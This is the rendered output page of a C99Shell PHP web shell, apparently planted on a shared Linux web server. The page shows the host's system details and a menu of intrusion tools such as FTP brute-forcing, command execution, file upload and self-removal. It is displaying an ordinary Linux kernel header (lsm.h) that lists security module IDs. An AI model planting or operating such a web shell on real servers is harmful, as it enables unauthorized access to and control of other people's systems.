!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/src/linux-hwe-6.5-headers-6.5.0-45/include/uapi/linux/   drwxr-xr-x
Free 687.44 GB of 879.6 GB (78.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     lsm.h (1.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
/*
 * Linus Security Modules (LSM) - User space API
 *
 * Copyright (C) 2022 Casey Schaufler <[email protected]>
 * Copyright (C) Intel Corporation
 */

#ifndef _UAPI_LINUX_LSM_H
#define _UAPI_LINUX_LSM_H

/*
 * ID values to identify security modules.
 * A system may use more than one security module.
 *
 * LSM_ID_XXX values 32 and below are reserved for future use
 */
#define LSM_ID_INVALID        -1
#define LSM_ID_SELINUX        33
#define LSM_ID_SMACK        34
#define LSM_ID_TOMOYO        35
#define LSM_ID_IMA        36
#define LSM_ID_APPARMOR        37
#define LSM_ID_YAMA        38
#define LSM_ID_LOADPIN        39
#define LSM_ID_SAFESETID    40
#define LSM_ID_LOCKDOWN        41
#define LSM_ID_BPF        42
#define LSM_ID_LANDLOCK        43
#define LSM_ID_CAPABILITY    44

/*
 * LSM_ATTR_XXX values identify the /proc/.../attr entry that the
 * context represents. Not all security modules provide all of these
 * values. Some security modules provide none of them.
 */
/* clang-format off */
#define LSM_ATTR_CURRENT    (1UL << 0)
#define LSM_ATTR_EXEC        (1UL << 1)
#define LSM_ATTR_FSCREATE    (1UL << 2)
#define LSM_ATTR_KEYCREATE    (1UL << 3)
#define LSM_ATTR_PREV        (1UL << 4)
#define LSM_ATTR_SOCKCREATE    (1UL << 5)
/* clang-format on */

#endif /* _UAPI_LINUX_LSM_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0108 ]--